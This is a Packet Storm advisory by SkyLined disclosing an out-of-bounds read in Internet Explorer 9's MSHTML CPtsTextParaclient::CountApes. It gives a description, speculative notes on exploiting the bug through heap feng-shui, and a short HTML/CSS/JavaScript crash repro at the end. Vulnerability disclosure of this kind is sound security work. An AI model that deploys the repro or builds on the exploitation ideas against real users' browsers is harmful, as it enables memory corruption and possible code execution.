exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Internet Explorer 9 MSHTML CPtsTextParaclient::CountApes Out-Of-Bounds Read

Microsoft Internet Explorer 9 MSHTML CPtsTextParaclient::CountApes Out-Of-Bounds Read
Posted Nov 5, 2016
Authored by SkyLined

Microsoft Internet Explorer 9 suffers from a MSHTML CPtsTextParaclient::CountApes out-of-bounds read vulnerability.

tags | exploit
SHA-256 | 99089ae366a7f7d4e65b3282f45f00fb4bd55bb17255adf843050757f6024bd8

Microsoft Internet Explorer 9 MSHTML CPtsTextParaclient::CountApes Out-Of-Bounds Read

Change Mirror Download
Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the third
entry in that series.

The below information is also available on my blog at
http://blog.skylined.nl/20161104001.html. There you can find a repro
that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 9 MSHTML CPtsTextParaclient::CountApes out-of-bounds read
==============================================================

Synopsis
--------
A specially crafted webpage can cause Microsoft Internet Explorer 9 to
access data before the start of a memory block. An attack that is able
to control what is stored before this memory block may be able to
disclose information from memory or execute arbitrary code.


Known affected versions, attack vectors and mitigations
-------------------------------------------------------
+ **Microsoft Internet Explorer 9**

An attacker would need to get a target user to open a specially
crafted webpage. As far as can be determined, disabling JavaScript
should prevent an attacker from triggering the vulnerable code path.

Description
-----------
It's quite common in MSIE for an object to "contain" another object in
memory, and for MSIE to add offsets to pointers to find a contained
object, or to subtract offsets to find the container of such a contained
object. It appears that this vulnerability revolves around MSIE assuming
one object is contained inside another, whereas in reality it is not.
The code is using a flag in the object to determine if it is a
"stand-alone" object or a "contained" object. The bug is that either the
code is using this flag incorrectly (the flag is correct, but does not
indicate the object is a "contained" object) or the flag has been set
incorrectly (the code is correct, but the flag should not have been set
as the object is not "contained" in another object).

Eventually, a method is called to operate on an object using a pointer
at an offset *before* allocated memory.

Exploitation
------------
Using Heap Feng-Shui, it may be possible to allocated a heap block
immediately before the one used in the bug and control its content in
order to control the data the code is operating on. Unfortunately, at
the time I did not look at what the code did with the data if the access
violation could be prevented, so it's not possible for me to say exactly
what an attacker might do with this vulnerability. But one can speculate
that this might allow an attacker to have the code use some secret value
(e.g. a pointer to a function in a modules) in a way that allows him/her
to retrieve the value (i.e. information disclosure). It might be
possible to have the code modify a value located anywhere in memory,
and/or have the code call/jump to a location of an attackers choosing
(i.e. arbitrary code execution).

I did not investigate the crash on x64, but I can only imagine the code
is the same, but the offsets are different.

Cheers,

SkyLined


Repro:

<!DOCTYPE html>
<!-- This file must be loaded inside an iframe in another web-page to trigger the vulnerability. -->
<html>
<head>
<style>
oElement1 {
position: absolute;
}
oElement2:after {
position: relative;
content: counter(x);
}
</style>
<script>
onload = function () {
oElement1 = document.createElement('oElement1');
document.documentElement.appendChild(oElement1);
oElement2 = document.createElement('oElement2');
document.documentElement.appendChild(oElement2);
};
</script>
</head>
</html>
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close